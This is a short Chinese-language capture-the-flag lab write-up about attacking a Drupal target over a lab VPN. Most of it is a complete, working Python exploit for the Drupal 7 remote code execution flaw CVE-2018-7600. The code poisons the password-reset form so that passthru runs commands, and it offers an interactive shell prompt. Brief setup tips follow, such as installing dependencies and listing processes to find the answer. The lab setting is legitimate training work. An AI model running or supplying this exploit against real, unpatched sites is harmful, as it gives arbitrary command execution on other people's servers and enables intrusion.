按要求下载VPN连接后
发现是drupal
用linux搜索相关漏洞
使用最常见的cve-2018-7600漏洞
在网上搜索该漏洞的poc
#!/usr/bin/env python3
import requests
from bs4 import BeautifulSoup
def pwn_target(target, function, command, proxy):
requests.packages.urllib3.disable_warnings()
proxies = {'http': proxy, 'https': proxy}
#print('[*] Poisoning a form and including it in cache.')
get_params = {'q': 'user/password', 'name[#post_render][]': function, 'name[#type]': 'markup', 'name[#markup]': command}
post_params = {'form_id': 'user_pass', '_triggering_element_name': 'name', '_triggering_element_value': '', 'opz': 'E-mail new Password'}
r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
soup = BeautifulSoup(r.text, "html.parser")
try:
form = soup.find('form', {'id': 'user-pass'})
form_build_id = form.find('input', {'name': 'form_build_id'}).get('value')
if form_build_id:
#print('[*] Poisoned form ID: ' + form_build_id)
#print('[*] Triggering exploit to execute: ' + command)
get_params = {'q': 'file/ajax/name/#value/' + form_build_id}
post_params = {'form_build_id': form_build_id}
r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
parsed_result = r.text.split('[{"command":"settings"')[0]
print(parsed_result)
except:
print("ERROR: Something went wrong.")
raise
def main():
print()
print('=============================================================================')
print('| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |')
print('| by xiugou |')
print('=============================================================================\n')
function = "passthru"
proxy = "socks5://127.0.0.1:1080"
while True:
target = "http://172.18.0.2"
command = input("shell>> :")
try:
pwn_target(target.strip(), function.strip(), command.strip(), proxy.strip())
except KeyboardInterrupt:
print("Exit program.")
break
if __name__ == '__main__':
main()
把地址改成需要利用的地址
在终端尝试运行
如果报错可以尝试进入python输入
pip install beautifulsoup4
或者进入pycharm中(如果是用pycharm的话)
在里面搜索beautifulsoup4下载即可
题目是要进程号
输入ps -ef查看进程
缺包
python3.9 -m pip install pysocks
再访问即可
若无报错但长时间无法访问,重启VPN即可